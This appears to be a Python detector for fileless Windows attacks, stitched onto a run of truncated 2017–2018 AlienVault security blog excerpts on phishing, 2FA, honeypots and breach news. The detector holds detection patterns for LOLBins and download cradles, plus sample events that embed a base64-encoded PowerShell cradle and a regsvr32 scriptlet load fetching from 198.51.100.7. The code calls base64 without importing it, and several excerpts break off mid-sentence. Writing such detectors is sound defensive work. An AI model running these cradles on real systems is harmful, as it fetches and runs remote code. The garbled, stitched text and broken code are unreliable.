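import re

# Signed Windows binaries routinely abused to run code without dropping a file.
LOLBINS = {"powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "certutil.exe", "wmic.exe"}

# Office processes spawning a script host is the classic maldoc-to-fileless chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line fragments typical of download-and-execute-in-memory tradecraft.
SUSPICIOUS_RE = re.compile("|".join([
    r"downloadstring\(", r"\biex\b", r"invoke-expression", r"frombase64string",
    r"reflection\.assembly", r"-enc(odedcommand)?\s", r"-w(indowstyle)?\s+hidden",
    r"-nop\b", r"scrobj\.dll", r"/i:https?://",
]), re.IGNORECASE)

# PowerShell -EncodedCommand (also -enc / -e) followed by a base64 blob.
ENCODED_CMD_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell encoded command (base64 of UTF-16LE), else None."""
    match = ENCODED_CMD_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the list of reasons an event looks fileless; an empty list means nothing matched."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if image in LOLBINS and parent in OFFICE_PARENTS:
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Scan the visible command line and, when present, the decoded payload too.
    haystack = cmdline if decoded is None else cmdline + " " + decoded
    for match in SUSPICIOUS_RE.finditer(haystack):
        reasons.append("suspicious fragment: " + match.group(0).strip())
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event with at least one reason."""
    hits = []
    for index, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed payload: the kind of download cradle an encoded command usually hides.
PAYLOAD_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed events: one benign editor, a maldoc chain, a regsvr32 scriptlet load, a scheduled script.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\dave\notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {basename(SAMPLE_EVENTS[index]['Image'])}")
        for reason in reasons:
            print("   -", reason)
```

The fourth event shows the cost of this approach: a legitimate scheduled PowerShell script passes only because its command line carries none of the listed fragments, so in production the parent/child and fragment lists need tuning against your own baseline rather than being taken as-is.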
The urgent need to adapt existing protection to address fileless techniques is one of the primary factors driving up prevention costs. To begin with, the rapid proliferation of these types of attacks has caused organizations to lose faith in traditional antivirus (AV) security measures. As a result, companies are either replacing or supplementing their existing AV with new endpoint protection solutions. Unfortunately, because the majority of these options were designed for large enterprise security teams, they are typically too expensive and complex for mid-market organizations. Not only do these products incur up-front implementation costs in the form of professional installation services and other expenses, they also typically increase ongoing management costs because of things like:

Greater expertise requirements: As traditional security solutions struggle to adapt to the new threats, both they and new entrants into the market are rolling out new features and functionality that make management more complex. This in turn can create additional service costs and also higher staffing costs, as companies find they need to hire more senior IT security professionals to manage the advanced solutions.

Additional time and resources spent on monitoring: The majority of solutions t

Published 2018-01-03. Source: AlienVault Blog, http://feeds.feedblitz.com/~/514697018/0/alienvault-blogs~Fileless-Attacks-are-Driving-Up-Security-Complexity-amp-Costs

I Am Dave

I can’t think of many (well, no) real industries that treat their users, peers, and customers with the same level of disdain. Imagine the automotive industry pushing a similar message.
‘On one hand we have seatbelts, ABS, airbags, five star safety features… and on the other hand we have dumb drivers.’ Or a gym stating, ‘We have personal trainers, protein shakes, free weights, machines, exercise classes… and on the other hand, we have lazy people that just want to binge watch shows and eat pizza.’ Maybe a college could claim, ‘We have the best teachers in the world, pity about the unruly students.’ No, seriously, I mean, governments have been overthrown for a lot less. I’m frankly quite surprised there hasn’t been at least some level of civil unrest where an unruly mob surrounded the IT Security department, only to be dispersed by the CISO, dressed in full riot gear with a water cannon.

While most security advice for users is all well and good, it is far from practical for the vast majority. How do I know this? Well, after giving out security advice for most of my career, I recently found myself falling short of much of my own advice. Our CISO at AlienVault, John McLeod, is a very nice man. But I did feel the urge to shake a fist at him a few days ago after I fell victim to a rather clever phishing email he’d sent out as part of an awareness campaign. It was well-crafted, had no grammatical errors, and in my haste while on my phone, I clicked on the embedded link. There goes my perfect record of not falling for a simulated phishing email. Then I was hit by a second surprise as I was informed by a service provider that my account had been disabled due to my credentials being found in a breach. I was grateful to the service provider for informing me, so I went about diligently changing my password, when I realised that this provider also had two-factor authentication which I had not enabled. Three strikes. I then spent the better part of the next two hours changing old passwords (I may have reused a couple), enabling two-factor authentication wherever it was available, and doing a search for all my various credentials on haveibeenpwned.com.
It made me realise how security still has a long way to go in perfecting its user experience: creating products that users genuinely find useful, usable, credible, accessible, valuable, or even desirable. But most of all, it made me realise that while I may work in IT Security, I too am Dave.

Published 2018-01-02. Source: AlienVault Blog, http://feeds.feedblitz.com/~/514476918/0/alienvault-blogs~I-Am-Dave

Things I Hearted this Week – 29th December 2017

And here we are, the last week of 2017! Congratulations for making it through and thank you for sticking with us. I really enjoy pulling together these weekly recaps, and I hope you enjoy them and find them informative. This week has been a quiet week as people seem to be in constant limbo as to whether they should be working or vacationing. But I searched tirelessly for you – because that’s just the kind of person I am. Enjoy, and hope to see you again in 2018.

Vendor Analyst Briefings

Our very own Kate Brew started off a discussion on Twitter a few days ago on how many vendors don’t know how to brief analysts. Anton Chuvakin of Gartner chimed in with a detailed listing of dos and don’ts, followed closely by Adrian Sanabria sharing his experiences. Not wanting to be left out, I also added my 2 cents, thus completing the trilogy.
Important: How to Impress / Annoy an Analyst During a Vendor Briefing? Best / Worst Tips Here! | Anton Chuvakin, Gartner
What is your product and what does it do? | Adrian Sanabria, Savage Security
Analyst Vendor Briefings | Javvad Malik, J4vv4D

Dressed for success

Ed Amoroso offers some personal advice (especially for Millennials) on proper dress selection for men and women in the modern technology-based work environment, focused on showing respect for others.
Dress for Tech Success | Edward Amoroso, LinkedIn

Credential Stuffing

With quite literally billions of leaked credentials available online, it is highly likely that some of them belong to your customers or, worse, to your employees or your organisation. These details can then be used to systematically attempt to log into your service or business in an attempt to take over those accounts. This article provides an overview of why and how these attacks take place, as well as some fingerprints and identifiers to help you monitor your environment for them.
Credential Stuffing: How breached credentials are put to bad use. | Breachinsider.com

Cryptocurrency mining malware

Digimine spreads via Facebook Messenger using a Google Chrome browser extension. This isn’t the first, and certainly won’t be the last, example of cryptomining malware, something we may see increase in 2018. I should have added it to my list of predictions!
Digimine Malware Steals Your Computer Power to Mine Crypto-Currency | eWeek

Rating Citizens

The Chinese government plans to launch its Social Credit System in 2020. The aim? To judge the trustworthiness – or otherwise – of its 1.3 billion residents

Published 2017-12-29. Source: AlienVault Blog, http://feeds.feedblitz.com/~/513636112/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-December

Why Healthcare Security Awareness Training Doesn't Work (And What to Do About It)

The last five years have seen a meteoric rise in the number of cyberattacks targeting healthcare organizations. Why? Because healthcare organizations have some of the lowest security budgets of any industry, and personal healthcare records are worth a fortune on the dark web. Don’t believe me?
Try this: threat actors can make between $285,000 and $1.7 million from a single successful healthcare data breach. At that rate of return, it really shouldn’t be surprising to see how regularly healthcare breaches are hitting the headlines. If you’re in the healthcare industry, you’re probably feeling concerned. After all, healthcare organizations are highly complex environments, and they can be a tremendous challenge to secure. Where should you even start?

User-Centric Security

Before you start spending big on expensive security products, it makes sense to look at where the greatest risks lie. To do that, let’s take a look at the most common causes of healthcare data breaches in recent years. According to the 2016 Data Breach Investigations Report, produced by Verizon, there are three primary concerns:

1. Insiders (mainly negligence)
2. Lost or stolen devices
3. Phishing

Do you notice anything about these threats? Here’s a clue: they aren’t rooted in technology. Quite the opposite, in fact: they’re all rooted in human behavior. Now, of course, security products can be invaluable in dealing with these threats. Devices can be encrypted, user access levels can be tightly controlled, and network activity can be monitored. You can even use spam filters and content scanners to weed out most malicious communications. But what you can’t do is totally isolate your users from malicious activity… it’s just not possible. One way or another your users will be exposed, and they must be ready to deal with it. By making the effort to properly train your users, you can hugely raise the security profile of your organization.

Out with the Old

If I had to guess, I’d say your existing security awareness training is… less than comprehensive. You’re not alone. In most healthcare organizations, security awareness training wouldn’t even exist if it wasn’t a major requirement of HIPAA compliance.
But knowing that the greatest threats to your organization are all rooted in human error, doesn’t that seem crazy? If you’re genuinely serious about reducing cyber risk, there are going to need to be some dramatic changes. Perhaps the biggest problem I see with the average security training program is that it is focused on completely the wrong metric: awareness. Ask any behavioral psychologist whether having more information causes people to make better decisions, and you know what they’ll say? Absolutely not. That’s why, despite understanding more than ever about nutrition, we have a glo

2017-12-27T14:00:00+00:00 | http://feeds.feedblitz.com/~/513183718/0/alienvault-blogs~Why-Healthcare-Security-Awareness-Training-Doesn%e2%80%99t-Work-And-What-to-Do-About-It | www.secnews.physaphae.fr/article.php?IdArticle=455331

Things I Hearted this Week 22nd December 2017

NatWest_help why the homepage wasn’t secure, the Bank initially tried to downplay the issue. But the bullying on Twitter forced the changes. Troy Hunt led the charge with “Securittyyyyy”, much like Mel Gibson declared “Freeedom” in Braveheart, and NatWest finally gave in and upgraded within 48 hours. The Security Avengers (name pending) then fired a warning shot across other major banks that did not have secure homepages, which has likely got many a security executive in a boardroom explaining likelihood and impact slides.

I'm Sorry You Feel This Way NatWest, but HTTPS on Your Landing Page Is Important | Troy Hunt
NatWest overhauls web security after online confrontation | Computing
NatWest changes website security following heated exchange with cyber experts | ITPro
NatWest bank spat prompts web security changes | BBC

Why incident response is the best cybersecurity ROI

Many times, there is little influence over what companies run and what it is run on.
Chances are there will be failures or breaches – what is within the sphere of control is how well those incidents are responded to.

Why incident response is the best cybersecurity ROI | CSO Online

Welcome to the hotel hackifornia

Christoph Brandstatter is managing director of the four-star Seehotel Jagerwirt in Austria's Alps. His hotel's electronic door locks and other systems were hacked for ransom four times between December 2016 and January 2017. He paid a ransom of two bitcoins, at that time about €1,600 (£1,406; $1,882). He’s trained his staff to recognise phishing emails that may seem genuine but actually contain malware. And he's moved back to traditional metal keys.

Lock out: The Austrian hotel that was hacked four times | BBC

The restaurant that didn’t exist

People increasingly make decisions based on what they read on the internet. There’s an inherent trust about it. You book a cab through an app to take you to the airport, where you board a plane which you booked online, to go and stay in a stranger's apartment you found through a different site. But it’s a fragile ecosystem that’s open to abuse, as one freelance writer discovered when his unique restaurant beat out thousands to rank well on TripAdvisor for a time, drawing a flood of interest. The problem was, though, it didn’t exist.

2017-12-22T14:00:00+00:00 | http://feeds.feedblitz.com/~/512302508/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-December | www.secnews.physaphae.fr/article.php?IdArticle=454695

Building Personal Brand: From One InfoSec Student to Another

Finding employment opportunities as a student is challenging; this is no new fact. Students are consistently facing trouble seeking internships and co-op opportunities. I myself am a student, and I have found a solution that has been seemingly effective for career development thus far: personal branding.
Personal branding helps students compensate for the work experience that we just haven’t had the opportunity to pursue yet. Personal branding means building a personal “brand” that people associate you with. You have probably already started developing your own personal brand with personalized resumes and cover letters. These are essentials that our teachers always told us we need growing up, and this is true; however, it is 2017, and with more students than ever before, the job market has become very competitive. The opportunities to find internships as an undergrad still very much exist. We are going to take a look at what you can do to break away from the job-searching norms by building your personal brand. Personal brand plays a key role in developing your identity as an aspiring security professional. This article will help guide you to become the nontraditional student that you need to be to land interesting interviews.

The pitch. “Could you tell me a bit about yourself?” Be prepared to respond to this question comfortably at a moment’s notice. Know what your personal selling features are, and strut your achievements proudly and passionately, but not arrogantly. Knowing what to say in “elevator talk” situations allows us to network on the fly at any given moment.

The resume. It is an obvious expectation of any serious employer that your resume looks good. Your resume will act as a professional summary of your identity, and employers will profile you accordingly. Dedicate some of your efforts to ensuring that your resume effectively and professionally reflects your skillset, goals, past experiences, and projects. Keep your resume up to date, and actively rework it when you can.

The business card. Some people may consider a contact card overkill, especially for students, but I disagree.
The need for us to differentiate ourselves as students is becoming increasingly necessary, proportionate to the number of students being pumped out by academia and other routes for job-seekers to educate themselves. I printed some contact cards using VistaPrint for my first few conferences (DEF CON, Black Hat USA, and HackFest), and I have received only positive feedback; in fact, the CEO of the cybersecurity firm that I will be interning at in May was impressed, responding, “Wow, this kid has a business card? He’s serious.” The act of handing someone a contact card alone

2017-12-20T14:00:00+00:00 | http://feeds.feedblitz.com/~/511795818/0/alienvault-blogs~Building-Personal-Brand-From-One-InfoSec-Student-to-Another | www.secnews.physaphae.fr/article.php?IdArticle=453446

My Password Pal

Someone said those words to me the other day. As an InfoSec professional, I have grown accustomed to this type of indignant proclamation. My jaw no longer drops to the table when I hear folks speaking this way, but I still have trouble stifling an audible sigh. As usual, when confronted with this reality, I experience the usual stages of information security grief. Why don’t they get it? Where have we gone wrong? Should we give up? Who still uses the phrase “Deal with it”? Fortunately, the statement made by my password “pal” was in the context of getting set up with a multi-factor login system. I have been a strong supporter of two-factor authentication for a long time. I even took the bold step of predicting that at least one social media platform would force 2FA on all their subscribers this year. So far, this has not happened, and even though no one is forcing 2FA upon their subscribers, it seems to be getting some attention and adoption in many corporate settings.
In fact, a new regulation in New York prescribes multi-factor authentication for all remote logins unless the CISO has approved in writing the use of reasonably equivalent or more secure access controls. What is the meaning of a “reasonably equivalent control”? In InfoSec, we call those “compensating controls”. These controls were introduced in the first version of the Payment Card Industry Data Security Standard (PCI DSS). The standard definition of compensating controls consists of 4 parts. Compensating controls MUST:

1. Meet the intent and rigor of the original control.
2. Provide a similar level of defense as the original requirement.
3. Be “above and beyond” other requirements.
4. Be commensurate with the additional risk imposed by not adhering to the original requirement.

That is a tall order to fill, and it seems much more difficult than instituting a 2FA solution. There are so many multi-factor options out there today; one has to wonder why people aren’t jumping on board with these systems. 2FA isn’t limited only to corporate systems. Some tools that folks can use on their personal accounts are free, such as some of the “authenticator” applications offered by various vendors. Some services such as Twitter, and at least one security organization (EC-Council), are still using text-based two-step verification, and we know that isn’t perfect, but it is still better than no security. A 2FA system eases the sting of bad passwords considerably. Now when someone tells me “that’s my password pal, deal with it”, I no longer have to sigh. While my internal cynic may respond in kind, “well now you have 2FA, so YOU deal with it, Sparky”, I am comforted, however slightly, that an attacker has to jump one more hurdle before he can log into the account of mister “Spring2017”.
2017-12-19T14:00:00+00:00 | http://feeds.feedblitz.com/~/511569684/0/alienvault-blogs~My-Password-Pal | www.secnews.physaphae.fr/article.php?IdArticle=452707

Agile Development, Agile Documentation

Then along came the hyperlink. (Yes, that’s what we called it when such things were shiny and new and disruptive. Quit laughing. Shhh.) And everything changed, and technical writers and editors sat around and talked about how this was going to alter our processes. But books were never going to stop being shipped with software, so it probably was just a niche thing. You can stop laughing at any point. I’ll wait. . . . Done? Good. Where was I? Oh yeah. Software documentation on paper. We all know that the world has gone through a few major upheavals since then, and one of the most glorious is the embracing of Agile methodology. Not just because, well, Agile, but because, to be totally honest, software has always been like that; it’s just that before, when code froze and unfroze and changed and refroze, those freezes were not unlike what’s happening to the permafrost now, which is to say, a sort of very thaw-ish kind of freeze. Which is to say, not a freeze at all. It’s just that back then, documentation teams pulled all-nighters at the end of a ship cycle to document things to make it appear as if we’d always planned the software to be like it was at the time it shipped. My profession was complicit in this unfrozen freezing for a long time, and in writing documentation that made it appear as if software and documentation were some kind of united front. I don’t think that, ultimately, we did anyone any favors in behaving that way. It’s a relief to have moved along from that place. The first time I saw the phrase “as-built documentation” I may have cried quiet tears of joy.
One of the great things about writing and editing documentation at AlienVault is that the teams have entirely embraced this methodology. And while there are plenty of different ways to approach the mechanics of producing “docs like code,” here we’re using Bitbucket (through Sourcetree) as a repository, and using MadCap Flare to generate HTML and PDF docs for consumption. And oh happy day, we are finally, wholly, collaborative. No more of the “I’m in the doc and you have to wait until I’m done if you want to work on it.” No more of the “Hello. My name is Reviewer. You overwrote my changes. Prepare to die.” We can build the docs together, at roughly the speed at which the software is being coded, without having to wait around for the (wholly mythical, in my experience) code freeze before we begin. The benefits for technical editing, specifically, are phenomenal. When my writers finish working on a ticket (Did I mention Jira yet? I’m so happy to be working in a ticketing system instead of in the oubliette of my inbox), I can look at what they wrote directly in the Bitbucket repository, and I only need to edit what they changed, not the entire document each time. What this means is that, ultimately, we’re able to create documentation that’s more accurate, that matches what you see in the software, that allows you to fi

2017-12-18T14:00:00+00:00 | http://feeds.feedblitz.com/~/511322688/0/alienvault-blogs~Agile-Development-Agile-Documentation | www.secnews.physaphae.fr/article.php?IdArticle=452120

Things I Hearted This Week 15th December 2017

life of its own a few days ago. But I’m reminded of the ending monologue by Morgan Freeman in “The Shawshank Redemption”, in which he starts off by saying, “Get busy living or get busy dying.” So the thought of the week is, “Get busy securing, or get busy insecuring.” Hmm, doesn’t quite have the same ring to it.
Will have to think of a better word – but you catch my drift. Let’s jump into this week’s interesting security bits.

Mirai Mirai on the wall

I picture Brian Krebs as being a Liam Neeson type – he sees that his website is under attack by a never-before-seen DDoS attack. He mutters to himself, “I don’t know who you are, but I will hunt you, I will find you, and I will blog about it until you get arrested, prosecuted, and thrown in jail.” It so happens that this week the hackers behind the Mirai botnet and a series of DDoS attacks pled guilty.

The Hackers Behind Some of the Biggest DDoS Attacks in History Plead Guilty | Motherboard
Mirai IoT Botnet Co-Authors Plead Guilty | KrebsonSecurity
Botnet Creators Who Took Down the Internet Plead Guilty | Gizmodo

Bug Laundering Bounties

Apparently, HBO negotiated with hackers, paying them $250,000 under the guise of a bug bounty as opposed to a ransom. Maybe in time it will be found that HBO acted above board, maybe it was a sting operation, maybe it was a misconstrued email. The worrying fact is that any payment exchange system can be used to launder money. However, bug bounty providers don’t (as far as I can tell) have financial services obligations. Does the bug bounty industry need more regulation (shudder)?

Leaked email shows HBO negotiating with hackers | Calgary Herald
Remember the 'Game of Thrones' leak? An Iranian hacker was charged with stealing HBO scripts to raise bitcoin | USA Today
Uber used bug bounty program to launder blackmail payment to hacker | Ars Technica

Inside a low budget consumer hardware espionage implant

I’m not much of a hardware expert – actually, I’m not much of a hardware novice either. But this writeup by Mich is awesome. I didn’t even know there were so many ways to sniff, intercept and basically mess around with stuff at such small scale. It’s extremely detailed and I’ve permanently bookmarked it for future reference.
2017-12-15T14:00:00+00:00 | http://feeds.feedblitz.com/~/510731884/0/alienvault-blogs~Things-I-Hearted-This-Week-th-December | www.secnews.physaphae.fr/article.php?IdArticle=451486

Explain How Honeypots Work to Me

If you’ve ever had an ant problem in your home, it’s likely that you’ve used ant traps. Ants are attracted to food high in carbohydrates, especially sugary stuff. Ant traps work because they contain bait that lures ants in. So, they might go for your ant trap rather than the cookie crumbs you dropped on the kitchen floor. When used properly, the trap allows you to kill ants before they infest your home. Honeypots in computer networks use the same concept. Cyber attacks travel through the internet to private computer networks constantly. What if you could put something in your network that will attract attacks so you can catch them before they hit your important server and client machines?

How do you use the honeypot concept for your network?

So, you want to set up something on your network that looks like an attractive computer to attack. Should you just install Windows 3.1 on a legacy machine, make sure its TCP/IP interface has basic functionality, and plug an Ethernet cable into it? No, that would be a terrible idea. Ideally, a honeypot should resemble a computer on your production network, but with weaker security. In the long run, it’s probably better to make your honeypot a virtual machine. These are easier to maintain and are more scalable. You can tinker around with the virtual hardware specs more easily, and experiment with different amounts of memory and CPU cores. Plus, because virtualization sandboxes your honeypot OS from its host machine, it allows you to contain the effects of cyber attacks more effectively. Did your virtual machine honeypot get infected with ransomware?
Just delete it and its virtual disk from your VM client and make a new one! Install your honeypot virtual machines from the same disc images you use to install operating systems in your production network. Configure them in much the same way, with the same drivers and applications. Just make the security a bit weaker than your information security policy requires. Make fake accounts that are local to your honeypot, and give them weak passwords. Be sure that your honeypot doesn’t automatically install security patches, and make the most recently installed patches a few months old. Configure its local firewall to have more open TCP/IP ports, and fewer filtered ports altogether. Leave more of the default OS and application settings. That way, if an attacker OS-fingerprints your honeypot, they can try exploiting some vulnerabilities that have been known for a long time. Or not. The basic principle of making your honeypot like your production machines, but less security-hardened, should be maintained in most situations. But all the other details may be tweaked and modified according to your specific needs. Whatever configuration and setup is best may take some experimentation to determine. A good honeypot will allow you to understand what sort of cyber attacks your production machines may face. Having a honeypot that teaches you about malicious network activity will likely take some trial and error. Your honeypot must also be set up so that it constantly generates logs on every applicable function. At the very least you should make sure that its OS system logging works, and there should be constant logging on its built-in software firewall. If you use some sort of antivirus software in your honeypot, its logs are important as well. You can then run all those logs through a SIEM, just like all of the other logs your network generates. The next question is, where should you put your honeypots?
Putting a

2017-12-14T14:00:00+00:00 | http://feeds.feedblitz.com/~/510471676/0/alienvault-blogs~Explain-How-Honeypots-Work-to-Me | www.secnews.physaphae.fr/article.php?IdArticle=450778

Emerging Technologies and the Cyber Threat Landscape

Juniper Research suggests that the rapid digitization of consumers’ lives and enterprise records will increase the cost of data breaches to $2.1 trillion globally by 2019. About 1.9 billion data records were exposed in the 918 data breaches that occurred in the first half of 2017, up 164 percent from the last half of 2016. According to a recent AT&T Cybersecurity Insights report, some 80 percent of the IT and security executives surveyed said their organizations came under attack during the previous 12 months. This rising threat trend, coupled with the rapid growth in sophistication of malware, ransomware, DDoS, and social engineering attacks, has created a conundrum. How do we protect ourselves in an increasingly connected world? There is really no single answer or remedy to our digital vulnerabilities. Cybersecurity at its core is risk management: people, process, policies, and technologies. The latter category offers some interesting and useful tools to help survive in the cyber ecosystem. Nothing is completely un-hackable, but there is a myriad of emerging technologies that can help us navigate the increasingly malicious cyber threat landscape. Some of these cutting-edge technologies include:

Artificial Intelligence (human/computer interface) and Machine Learning
Automation and Adaptive Networks
Big Data: Real-time Analytics and Predictive Analytics
Biometrics and Authentication Technologies
Blockchain
Cloud Computing
Cryptography/Encryption
Quantum Computing and Supercomputing

Artificial intelligence (AI) has become a major focus area of cybersecurity investments.
AI and augmented reality technologies are no longer things of science fiction, and many leading companies are already developing technology to distribute artificial intelligence software to millions of graphics and computer processors around the world. Some of the basic activities computers with AI are designed for include: speech recognition; learning/planning; and problem solving. For cybersecurity, synthesizing data is surely an advantage in mitigating threats. Machine learning is the science of getting a computer to act without being explicitly programmed to. It often combines with AI and can be thought of as the rapid automation of predictive analytics. In cybersecurity terms, machine learning provides the fastest way to identify new attacks, draw statistical inferences and push that information to endpoint security platforms. George Washington University’s Center for Cybersecurity and Homeland Security, in a symposium on Trends in Technology and Digital Security, summed up AI’s cyber role and challenges: “Will AI benefit the attacker or the def

2017-12-13T14:00:00+00:00 | http://feeds.feedblitz.com/~/510151904/0/alienvault-blogs~Emerging-Technologies-and-the-Cyber-Threat-Landscape | www.secnews.physaphae.fr/article.php?IdArticle=449716

It’s Only A Hacker If It’s Linus Himself

Anyone who’s worked in any field related to internet security for any length of time has used the term hacker, or had the term used on them. We don’t use this term in AlienVault documentation, and thanks to some questions from fellow wordgeeks outside the company, I wanted to talk about why that is. One of the primary missions of technical documentation is to be absolutely clear and context-neutral.
You can’t know what the technical, educational, or socio-political background of your readers is; if you’re lucky and you work with an awesome sales team with global reach, the people reading your documentation come from an incredibly diverse, global audience, so the language used in your docs should be impossible to misinterpret no matter who or where the reader is. Back in the 13th century, a hacker was “a chopper, cutter,” perhaps also “one who makes hacking tools.” But by the time the term was used to refer to computers or technology generally, in 1975, it was already divergent, meaning both “one who works like a hack at writing and experimenting with software, one who enjoys computer programming for its own sake,” and “plodding, routine work.” Any time you have to rely on a modifier to make it clear what you mean, and your choice is between diametric opposites, you’re dealing with a problematic and highly contextualized term. For an example of this, you don’t have to look any further than Charlie Miller and Chris Valasek, the security researchers (there’s one term) who in 2015 figured out how to remotely take control of a Jeep Cherokee through Uconnect, and then presented that information at the Black Hat conference (there’s another connotation) and made the code available on the internet. They’d worked with Chrysler in advance, of course, so people paying attention could protect themselves. Sorta. And therein lies so much ambiguity. For the people who were paying attention, Miller and Valasek were the good kind of hackers who find vulnerabilities in advance of the bad kind of hackers finding those same vulnerabilities and exploiting them. The cars are deemed “hackable” (that’s bad, other than when you want to customize those features, then that’s good). Miller and Valasek are “hackers” according to the community (that’s good) but also “hackers” to Chrysler (that’s bad). See the problem there?
What you say and how you say it is entirely a function of your contextual relationship to the code. The term hacker is much like many other jargon terms that have fallen into pejorative use by the mainstream while still being claimed or re-claimed by those once denigrated by them… and all this ambiguity is not at all acceptable for inclusion in context-neutral documentation. As much as I cringe at referencing Wikipedia as a reference, this article is spot-on:

As usage has spread more widely, the primary misunderstanding of newer users conflicts with the original primary emphasis. In popular usage and in the media, computer intruders or criminals is the exclusive meaning today, with associated pejorative connotations. (For example, "An Internet 'hacker' broke through state government security systems in March.") In

2017-12-12T14:00:00+00:00 | http://feeds.feedblitz.com/~/509846496/0/alienvault-blogs~Its-Only-A-Hacker-If-Its-Linus-Himself | www.secnews.physaphae.fr/article.php?IdArticle=449180

The Impact of NotPetya and WannaCry

The flip side

While budget may not be as free-flowing as one may assume, it doesn’t mean that companies have been completely negligent. 65% of respondents stated they are more up to date with patching than they were previously, and half say they are using threat intelligence more regularly to stay ahead of emerging threats. A further 58% claim to have carried out a review of their organization's cyber security posture following the attacks. This is encouraging, as it means companies are not completely ignoring the challenges they face – and are leveraging existing investments to help get their companies in a better position. Although, as the attacks have shown, prevention alone isn’t enough, and it would also be prudent for organizations to focus their efforts on threat detection and response.

A makeover?
For IT professionals, 22% said their family and friends are more interested in hearing about their work, and 27% believe most people in their organization listen to their IT advice more than they did before. Unfortunately, it hasn’t translated to great financial rewards, with 10% having experienced an increase in job offers or managed to negotiate a pay increase following the attacks.

Incident Apathy?

IT Security remains a challenging environment within which to work, where resilience is the key to success. The sheer number of incidents that are reported on an almost daily basis may also be a contributing factor towards organizational apathy towards incidents. While attacks cannot be prevented, and IT Security may be a cost that organizations have to bear as a price of doing business in the digital age, it doesn’t necessarily mean that there are no options. Many security fundamentals can be implemented with little capital needed to source new products. Rather the

2017-12-11T14:00:00+00:00 | http://feeds.feedblitz.com/~/509270160/0/alienvault-blogs~The-Impact-of-NotPetya-and-WannaCry | www.secnews.physaphae.fr/article.php?IdArticle=448378

Things I Hearted this Week – 8th December 2017

Dr. Jessica Barker was the opening keynote and made some great points about optimism and how positive reinforcement is a far better motivator in security than the usual negativity. As I’m one that likes to take on board good ideas and implement them as quickly as possible, today’s wrap up will feature an optimistic and bright tone. So, put on your rose-tinted glasses, sit back, and enjoy this week’s wrap up.

Uber invests in Florida youth

A hacker identified only as a 20-year-old Florida man was apparently behind the Uber breach a year ago. Uber was so grateful it awarded him $100,000 via the HackerOne bug bounty platform, but wanted to keep its act of philanthropy quiet.
No word on whether the youth will spend the money on an orphanage or an animal shelter, but we are hopeful.

Uber hacked by a 20-year-old man in the US | Computer Weekly
Uber paid 20-year-old man to hide hack, destroy data | ZDNet
Three Uber security managers resign after CEO criticizes practices | Reuters

$60m in bitcoin shared

The days of Robin Hood aren’t over. Over $60m in cryptocurrency has been involuntarily redistributed after hackers broke into Slovenian-based bitcoin mining marketplace NiceHash.

More than $60 million worth of bitcoin potentially stolen after hack on cryptocurrency site | CNBC
Bitcoin: $64m in cryptocurrency stolen in 'sophisticated' hack, exchange says | The Guardian
$60m Bitcoin heist potentially hits cryptocurrency mining site | CBRonline

Three ways to improve cybersecurity maturity

I really like the name “The Rochford Files”, which is the contributed blog by Oliver Rochford on CSO. Keeping in tune with my optimistic theme, the subtitle is “here’s what’s holding us back” – but I’d rather rephrase it as “Here are our greatest opportunities”.

3 common cybersecurity maturity failings

Predictions

It’s that time of year for everyone to collectively gaze into crystal balls and predict what the new year will bring. I jumped onto the bandwagon myself and boldly made some predictions. The good thing about the future, though, is that it never comes, so you can never be proven wrong!
Six Cybersecurity Predictions for The Year Ahead | AlienVault

Published: 2017-12-08T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/507506118/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-December | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=447588 | Tags: Guideline, Uber

Six Cybersecurity Predictions for The Year Ahead

Cloud computing, ransomware, IoT, GDPR and technology politics are poised to make a significant impact on the world of security in 2018.

It's that time of the year again – the time for us to start gazing into crystal balls, pulling out the ouija board, and taking a DeLorean up to 88 miles per hour, all in an attempt to predict what the coming year will bring to information security. After extensive thought on the topic, I've come up with six predictions for 2018. Let's take a deep dive into each.

Lack of in-house expertise will cause ongoing cloud security woes

